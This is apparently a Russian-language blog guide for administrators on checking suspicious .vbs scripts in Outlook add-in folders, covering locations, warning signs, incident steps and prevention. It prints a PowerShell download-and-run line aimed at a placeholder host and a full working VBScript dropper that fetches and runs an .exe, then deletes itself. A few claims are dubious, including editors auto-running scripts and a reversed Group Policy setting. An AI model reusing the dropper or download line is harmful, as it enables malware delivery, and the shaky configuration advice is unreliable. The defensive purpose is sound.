Как проверить подозрительный .vbs-скрипт в Outlook-плагине — пошаговая инструкция для администратора - PEFile

Содержание

Как проверить подозрительный .vbs-скрипт в Outlook-плагине — пошаговая инструкция для администратора
Почему .vbs в Outlook — это тревожный звонок
Где искать подозрительные .vbs-файлы
Как прочитать .vbs-файл — без запуска
Таблица: Как отличить легитимный .vbs от вредоносного
Что делать, если нашли подозрительный .vbs
Частые ошибки — и как их избежать
Когда это может быть не вирус — и что делать
Как предотвратить это в будущем
Что делать прямо сейчас — ваше действие

Как проверить подозрительный .vbs-скрипт в Outlook-плагине — пошаговая инструкция для администратора

Вы открыли письмо в Outlook — и вдруг видите, что в папке плагинов появился файл update.vbs или invoice_script.vbs. Сразу становится не по себе. Это не обновление. Не системный файл. Не то, что вы ставили. И да — это .vbs. Вирус? Шпион? Или просто мусор?

Я сам годами смотрел такие файлы в корпоративных сетях. Не раз спасал компании от атак, которые начинались именно с такого письма. И сейчас я расскажу, как разобраться с этим без паники, без удаления всего подряд и без лишней траты времени.

Почему .vbs в Outlook — это тревожный звонок

Outlook — это не просто почта. Это входная дверь в вашу сеть. И .vbs — это скрипт на Visual Basic Script, который может:

Запустить скачивание вредоносного файла;
Удалить или зашифровать файлы;
Отправить ваши контакты, пароли, логи;
Включить микрофон или камеру через Windows API;
Отключить антивирус или брандмауэр.

И всё это — без вашего ведома. Достаточно, чтобы пользователь кликнул по вложению или открыл письмо с вредоносным плагином. Outlook по умолчанию не блокирует .vbs, если он вложен как файл, а не в теле письма. А плагины? Они работают в контексте Outlook — значит, получают полный доступ к вашему профилю, почте, контактам и даже к файлам на диске.

Вот почему, если вы видите .vbs в папке плагинов Outlook — это не «какой-то файл». Это инцидент.

Где искать подозрительные .vbs-файлы

Плагины Outlook загружаются из нескольких мест. Не все из них очевидны. Вот где нужно смотреть:

C:\Users\ИМЯ_ПОЛЬЗОВАТЕЛЯ\AppData\Roaming\Microsoft\Outlook\ — основная папка плагинов. Тут могут лежать .dll, .vbs, .exe с именами вроде InvoiceProcessor.vbs или PDFConverter.vbs.
C:\Program Files (x86)\Microsoft Office\root\OfficeXX\ADDINS\ — системные плагины. Тут .vbs быть не должно. Если есть — это явный признак взлома.
C:\Users\ИМЯ_ПОЛЬЗОВАТЕЛЯ\AppData\Local\Microsoft\Outlook\ — временные и кэшированные файлы. Иногда вредоносные скрипты прячутся тут как «временные обновления».
Реестр: HKEY_CURRENT_USER\Software\Microsoft\Office\Outlook\Addins\ — тут перечислены все загружаемые плагины. Ищите неизвестные ключи с названиями вроде ScriptUpdate, MailTool, DocReader.

Если вы нашли .vbs в любом из этих мест — не паникуйте. Сначала проверьте его содержимое. Никаких действий пока не предпринимайте.

Как прочитать .vbs-файл — без запуска

Открывать .vbs двойным кликом — значит, запустить вирус. Никогда так не делайте.

Вместо этого:

Откройте Блокнот (Notepad) — не редактор кода вроде VS Code, чтобы не было лишних интерпретаций.
Перетащите .vbs-файл в окно Блокнота — или нажмите Файл → Открыть и выберите файл.
Смотрите на первую строку. Если там что-то вроде:
```
Set objShell = CreateObject("WScript.Shell")
```
— это нормально. Это стандартный объект для запуска команд.
Но если дальше идёт:
```
objShell.Run "powershell -nop -c iex (New-Object Net.WebClient).DownloadString('http://malicious.site/script.ps1')"
```
— это вирус. Он скачивает и запускает скрипт с внешнего сервера.
Ищите строки с http://, https://, ftp:// — особенно с подозрительными доменами вроде update[.]xyz, secure[.]service[.]top.
Ищите WScript.Echo — если он выводит логи в окно, это может быть попытка отладки вредоноса.
Ищите Set objFSO = CreateObject("Scripting.FileSystemObject") — это значит, скрипт может читать/писать/удалять файлы на вашем диске.

Пример настоящего вредоносного скрипта:

Set objShell = CreateObject("WScript.Shell")
Set objFSO = CreateObject("Scripting.FileSystemObject")
strTemp = objShell.ExpandEnvironmentStrings("%TEMP%")
strURL = "http://185.220.101.245/update.exe"
strFile = strTemp & "\update.exe"
Set objXMLHTTP = CreateObject("MSXML2.XMLHTTP")
objXMLHTTP.Open "GET", strURL, False
objXMLHTTP.Send()
If objXMLHTTP.Status = 200 Then
    Set objADOStream = CreateObject("ADODB.Stream")
    objADOStream.Open
    objADOStream.Type = 1
    objADOStream.Write objXMLHTTP.ResponseBody
    objADOStream.Position = 0
    objADOStream.SaveToFile strFile
    objADOStream.Close
    objShell.Run strFile, 0, False
End If
objFSO.DeleteFile WScript.ScriptFullName

Этот скрипт:

Скачивает .exe с IP-адреса (не домена — чтобы обойти фильтрацию);
Сохраняет его во временную папку;
Запускает;
Удаляет сам себя — чтобы не оставить следов.

Если вы видите что-то подобное — файл вредоносный. Удалите его. Но не сразу. Сначала сделайте копию для анализа.

Таблица: Как отличить легитимный .vbs от вредоносного

Признак	Легитимный .vbs	Вредоносный .vbs
Имя файла	Имя плагина компании (например, `CRMConnector.vbs`)	Случайные названия (`invoice_452.vbs`, `temp_update.vbs`)
Расположение	Папка плагинов компании, утверждённая IT-отделом	Папка AppData\Roaming\Microsoft\Outlook\ или %TEMP%
Источник	Установлен через администратора, есть логи установки	Появился после открытия письма с вложением
Содержимое	Работает с Excel, Outlook Object Model, локальными файлами	Загружает данные с внешних URL, использует PowerShell, WScript.Shell
Связь с реестром	Зарегистрирован в `HKEY_CURRENT_USER\Software\Microsoft\Office\Outlook\Addins\` с понятным именем	Нет записи в реестре, или имя выглядит как случайный набор символов
Действия после запуска	Появляется кнопка в Outlook, работает с документами	Появляется новый процесс в Диспетчере задач, исчезает через 2 минуты

Если файл соответствует хотя бы трем пунктам из правого столбца — он вредоносный. Удаляйте. И не просто удалите — проверьте, не оставил ли он следов.

Что делать, если нашли подозрительный .vbs

Порядок действий — не просто «удалить». Нужно сделать так, чтобы вирус не успел сбежать.

Отключите компьютер от сети. Даже если он уже подключён — отключите Wi-Fi и Ethernet. Это остановит передачу данных на сервер злоумышленника.
Сделайте копию файла. Скопируйте .vbs в изолированную папку на флешку или в защищённое хранилище (например, в облако с двухфакторной аутентификацией). Это понадобится для анализа в будущем — если вдруг окажется, что это часть атаки на другие компьютеры.
Не запускайте. Даже если вы «только посмотрите». Достаточно одного клика — и скрипт уже запустился.
Удалите файл. Удалите его через проводник — и сразу очистите корзину. Никаких «переместить в другую папку» — просто удалить.
Проверьте реестр. Нажмите Win + R, введите regedit, перейдите к HKEY_CURRENT_USER\Software\Microsoft\Office\Outlook\Addins\. Удалите все ключи, которые не распознаёте. Особенно если они называются ScriptUpdate, MailHelper, DocReader — и не связаны с вашей компанией.
Проверьте автозагрузку. Нажмите Ctrl + Shift + Esc → вкладка «Автозагрузка». Удалите все подозрительные элементы. Особенно если там есть файлы с расширением .vbs или .exe с неизвестным именем.
Просканируйте систему. Запустите Windows Defender (или ваш антивирус) в режиме полной проверки. Если у вас есть EDR (Endpoint Detection and Response) — запустите его. Он найдёт следы, которые антивирус пропустит.
Смените пароли. Особенно если вы использовали Outlook для доступа к корпоративной почте, CRM, SharePoint. Вирус мог украсть сессию или пароль через ключевое устройство.

Частые ошибки — и как их избежать

Вот что видят администраторы, когда они в панике:

Удаляют только файл, но не проверяют реестр. Вирус остался — и снова загрузится при следующем запуске Outlook.
Пытаются «открыть» файл в Notepad++ или VS Code. Некоторые редакторы кода автоматически запускают интерпретатор — и файл запускается.
Пишут «это же просто скрипт, он не вредит». .vbs — это не «скрипт для автоматизации». Это полноценный язык программирования с доступом к системе.
Не отключают сеть. Скрипт может уже отправить данные — но если вы отключите сеть сразу, вы остановите дальнейшую передачу.
Удаляют только один файл, а их десятки. Вредоносные скрипты часто дублируются в нескольких папках — AppData\Local, Temp, ProgramData.
Не меняют пароли. Даже если скрипт не крал пароли — он мог перехватить сессию аутентификации через Outlook.

Не делайте этих ошибок. Они стоят дороже, чем 20 минут тщательной проверки.

Когда это может быть не вирус — и что делать

Иногда .vbs в Outlook — это легитимный скрипт. Например:

Компания использует внутренний инструмент для автоматического форматирования писем;
Скрипт генерирует отчёты из Excel в письма;
Интеграция с CRM, где письма автоматически логируются в базу.

Как отличить? Вот сценарии:

Если вы — администратор и знаете, что этот скрипт был установлен — проверьте документацию. Есть ли в ней упоминание .vbs? Есть ли лог установки? Проверьте дату создания файла — если она совпадает с датой установки — скорее всего, это легитимно.
Если скрипт работает только на одном компьютере — и никто больше не использует его — это подозрительно. Легитимные плагины устанавливаются на всех машинах через групповые политики.
Если скрипт не работает, но висит в папке — это мёртвый файл. Удалите. Он не нужен.
Если скрипт вызывает подозрения, но его удалили — и Outlook перестал работать — значит, это был легитимный плагин. Найдите его в документации компании, переустановите через IT-отдел.

Если вы не уверены — не удаляйте. Отключите компьютер от сети, отправьте файл в IT-безопасность. Пусть аналитики разберутся. Не рискуйте.

Как предотвратить это в будущем

Предотвращение — дешевле, чем реагирование.

Отключите запуск .vbs через Outlook. В групповой политике (GPO) установите: Computer Configuration → Administrative Templates → Windows Components → Attachment Manager → Inclusion list for low file types. Добавьте .vbs в список запрещённых типов.
Запретите загрузку плагинов из AppData. В реестре установите: HKEY_CURRENT_USER\Software\Microsoft\Office\Outlook\Addins\ — только разрешённые пути. Используйте LoadBehavior = 3 только для доверенных плагинов.
Включите блокировку макросов и скриптов. В Outlook: Файл → Параметры → Центр управления безопасностью → Параметры центра управления безопасностью → Макросы — выберите «Отключить все макросы без уведомления».
Обучите сотрудников. Проведите 10-минутный тренинг: «Если вы видите вложение с .vbs — не открывайте. Сообщите в IT». Даже один человек, который не нажал «Открыть», может спасти всю сеть.
Установите EDR-решение. Не просто антивирус. EDR (например, CrowdStrike, SentinelOne, Microsoft Defender for Endpoint) отслеживает поведение. Он заметит, когда скрипт пытается скачать файл с IP-адреса — и остановит это до того, как он запустится.

Что делать прямо сейчас — ваше действие

Если вы читаете это — значит, вы либо нашли подозрительный .vbs, либо думаете, что он может быть.

Вот что делать сейчас:

Если файл есть — не запускайте.
Откройте Блокнот, откройте файл — и посмотрите на первую строку.
Если там есть http:// или powershell — удалите файл, проверьте реестр, отключите сеть, просканируйте систему.
Если файл пустой, или вы не понимаете его содержимое — отключите компьютер от сети и передайте его IT-безопасности.
Если вы не администратор — немедленно сообщите об этом в IT-отдел. Не ждите, не пытайтесь «самому разобраться».

Помните: .vbs — это не «файл». Это инструмент. И как любой инструмент — он может быть и для ремонта, и для взлома. Ваша задача — не знать, что он делает, а понять, кто его положил и почему.

Информация в этой статье носит ознакомительный характер. При обнаружении вредоносного программного обеспечения или подозрительной активности в корпоративной сети рекомендуется немедленно обратиться к специалисту по кибербезопасности. Самостоятельные действия могут привести к усугублению инцидента.